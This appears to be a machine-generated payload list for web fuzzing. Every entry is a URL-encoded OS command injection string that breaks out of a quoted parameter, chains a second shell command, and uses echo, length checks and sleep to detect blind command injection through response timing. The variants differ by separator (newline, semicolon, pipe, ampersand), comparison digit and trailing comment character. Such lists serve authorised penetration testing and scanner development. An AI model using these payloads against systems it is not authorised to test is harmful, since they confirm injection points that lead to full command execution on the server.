+os-command-injection,'%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VQEAPQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%22%7C%20%5B%201%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%22%7C%20%5B%202%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%22%7C%20%5B%203%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%22%7C%20%5B%204%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%22%7C%20%5B%205%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%22%7C%20%5B%206%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%22%7C%20%5B%207%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%22%7C%20%5B%208%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%22%7C%20%5B%209%20-ne%20%24%28echo%20EUILIT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RIIZGU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%22%0A%20str%3D%24%28echo%20ROWALZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%22%3B%20str%3D%24%28echo%20TLXEJK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%22%7C%20%5B%201%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%22%7C%20%5B%202%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%22%7C%20%5B%203%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%22%7C%20%5B%204%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%22%7C%20%5B%205%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%22%7C%20%5B%206%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%22%7C%20%5B%207%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%22%7C%20%5B%208%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%22%7C%20%5B%209%20-ne%20%24%28echo%20FATRPK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%22%0A%20str%3D%24%28echo%20VYCNRP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%22%7C%20%5B%201%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%22%7C%20%5B%202%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%22%7C%20%5B%203%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%22%7C%20%5B%204%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%22%7C%20%5B%205%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%22%7C%20%5B%206%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%22%7C%20%5B%207%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%22%7C%20%5B%208%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%22%7C%20%5B%209%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' 